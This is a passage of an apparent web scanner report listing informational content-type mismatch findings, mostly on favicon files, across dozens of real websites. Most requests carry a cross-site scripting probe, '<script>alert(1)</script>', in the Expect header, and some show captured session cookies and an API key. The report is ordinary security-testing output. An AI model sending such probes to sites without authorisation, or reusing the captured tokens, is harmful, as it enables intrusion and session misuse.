Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..WMIDATx^..u..U...{N...-8    q%JHB.8.HB.....U)ww......+.T...o.ih.i.u....zC......s.=..k.9.....g.
...[SNIP]...

35.22. http://www.cyberhomes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cyberhomes.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberhomes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.23. http://www.dermnet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dermnet.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dermnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:01:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.24. http://www.developer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.developer.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.developer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 08 Mar 2011 21:40:03 GMT
ETag: "576e-49dff7476b2c0"
Accept-Ranges: bytes
Content-Length: 22382
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=8494
Date: Sun, 01 May 2011 23:16:19 GMT
Connection: close

............ .h...6... .... .........@@.... .(B..F...(....... ..... .....@.................... ... ... ...!...............)...)... ...........!... ... ... ... ... ...!.......!...C&..^>..iI..iJ..^?..C
...[SNIP]...

35.25. http://www.diskeeper.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.diskeeper.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diskeeper.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.26. http://www.earthfare.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.earthfare.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.earthfare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:10:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.27. http://www.fastpictureviewer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fastpictureviewer.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fastpictureviewer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:25:51 GMT
Server: Apache/1.3.41 (Unix) mod_perl/1.30 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Content-Type: text/html; charset=iso-8859-1
Content-Length: 20

HTTP Error Code 417"

35.28. http://www.freegroceriesdirectory.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freegroceriesdirectory.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freegroceriesdirectory.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.29. http://www.goodtoknow.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.goodtoknow.co.uk
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.goodtoknow.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 14 Apr 2011 08:28:48 GMT
ETag: "1c90d65-47e-4a0dcb6dc9000"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Date: Mon, 02 May 2011 00:18:20 GMT
Connection: close
Set-Cookie: browsertype=web; expires=Tue, 03-May-2011 00:18:20 GMT; path=/; domain=.goodtoknow.co.uk

............ .h.......(....... ..... .......................... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ........................................................... ... ........
...[SNIP]...

35.30. http://www.google.com/uds/Gfeeds

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /uds/Gfeeds

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /uds/Gfeeds?callback=google.feeds.Feed.RawCompletion&context=0&num=3&hl=en&output=json&q=http%3A%2F%2Fnetworkingexchangeblog.att.com%2Fne%2Fmanaging-network-risk-ne%2Ffeed%2F&key=ABQIAAAA5tdpImBf4eDcDKbLmSjk5xTUkbc6-RyEmhXHNETmcLgMd9n64RTmPO4_ao4eAxL3FEA8IPnbDDDvHQ&v=1.0&nocache=1304310827715 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 01 May 2011 23:33:51 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 19202
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 17498

google.feeds.Feed.RawCompletion('0', {"feed":{"feedUrl":"http://networkingexchangeblog.att.com/ne/managing-network-risk-ne/feed/","title":"Networking Exchange Blog .. Networking Exchange .. Managing R
...[SNIP]...

35.31. http://www.govacuum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.govacuum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.govacuum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:16:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.32. http://www.gpwa.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gpwa.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gpwa.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: WP7a
Date: Sun, 01 May 2011 23:44:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.33. http://www.greenhulk.net/forums/customavatars/avatar21634_4.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/customavatars/avatar21634_4.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar21634_4.gif HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:03:34 GMT
Server: Apache
Last-Modified: Wed, 09 Jun 2010 09:30:10 GMT
ETag: "1b70093-1824-488958d5c8c80"
Accept-Ranges: bytes
Content-Length: 6180
Cache-Control: max-age=2419200, public
Expires: Mon, 30 May 2011 02:03:34 GMT
Vary: User-Agent
Content-Type: image/gif

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

35.34. http://www.greenhulk.net/forums/customavatars/avatar27186_2.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/customavatars/avatar27186_2.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar27186_2.gif HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:03:32 GMT
Server: Apache
Last-Modified: Wed, 02 Jun 2010 00:39:26 GMT
ETag: "30897ad-16cb-48801526c0b80"
Accept-Ranges: bytes
Content-Length: 5835
Cache-Control: max-age=2419200, public
Expires: Mon, 30 May 2011 02:03:32 GMT
Vary: User-Agent
Content-Type: image/gif

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

35.35. http://www.greenhulk.net/forums/customavatars/avatar3537_6.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/customavatars/avatar3537_6.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar3537_6.gif HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:03:34 GMT
Server: Apache
Last-Modified: Sun, 21 Nov 2010 17:56:46 GMT
ETag: "3088250-15a6-49593dceb9380"
Accept-Ranges: bytes
Content-Length: 5542
Cache-Control: max-age=2419200, public
Expires: Mon, 30 May 2011 02:03:34 GMT
Vary: User-Agent
Content-Type: image/gif

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

35.36. http://www.greenhulk.net/forums/customavatars/avatar9792_2.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/customavatars/avatar9792_2.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar9792_2.gif HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:03:32 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 01:44:22 GMT
ETag: "3089646-176b-4877569c0a980"
Accept-Ranges: bytes
Content-Length: 5995
Cache-Control: max-age=2419200, public
Expires: Mon, 30 May 2011 02:03:32 GMT
Vary: User-Agent
Content-Type: image/gif

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

35.37. http://www.healthination.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.healthination.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthination.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:56:22 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Last-Modified: Thu, 29 Jul 2010 11:49:06 GMT
Content-Length: 3638
Cache-Control: max-age=4200
Expires: Mon, 02 May 2011 01:06:22 GMT
Accept-Ranges: bytes

..............h...&... ..............(....... ...........@...................................D...............j.......Q...........&...........Z...D......."...v.......O...9......$.....................
...[SNIP]...

35.38. http://www.highcharts.com/highslide/graphics/zoomout.cur

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /highslide/graphics/zoomout.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.highcharts.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:48:45 GMT
Server: Apache/2.2.16
Last-Modified: Tue, 10 Nov 2009 17:35:34 GMT
ETag: "5844108-146-47807bcc56580"
Accept-Ranges: bytes
Content-Length: 326
Connection: close
Content-Type: text/plain

...... ......0.......(... ...@.............................................................................................p............... ...@.............7...$    ..$    ..7.............................
...[SNIP]...

35.39. http://www.hsj.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hsj.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsj.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.40. http://www.ibegin.com/weather/weather_widget.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:42:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 773


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...

35.41. http://www.inmates-searches.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.inmates-searches.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inmates-searches.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.42. http://www.insites.eu/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.insites.eu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.insites.eu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.43. http://www.keds.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.keds.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.keds.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 28 Jan 2011 18:30:02 GMT
ETag: "1536-49aec41199e80"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:38:12 GMT
Connection: close

............ .h...&... .... .........(....... ..... ...................................................................................................................................................
...[SNIP]...

35.44. http://www.laterooms.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.laterooms.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.laterooms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 02 May 2011 00:28:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.45. http://www.leagle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.leagle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leagle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:53:28 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

35.46. http://www.mecum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mecum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mecum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:04:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.47. http://www.myfavoritegames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.myfavoritegames.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myfavoritegames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NID DSP CAO COR"
Date: Sun, 01 May 2011 23:31:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.48. http://www.newswiretoday.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newswiretoday.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cekfc38cl4o1p4aijb5c05v7u6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 31 Dec 2005 02:04:57 GMT
ETag: "41963a7-57e-4092e6061a440"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

..............h.......(....... ...........@.......................#j|..5>.5...`...y.......G.................)...........................................................................................
...[SNIP]...

35.49. http://www.nfcc.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nfcc.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nfcc.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:18:11 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.50. http://www.nylaarp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nylaarp.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nylaarp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:33:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.51. http://www.picindividuals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.picindividuals.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.picindividuals.com
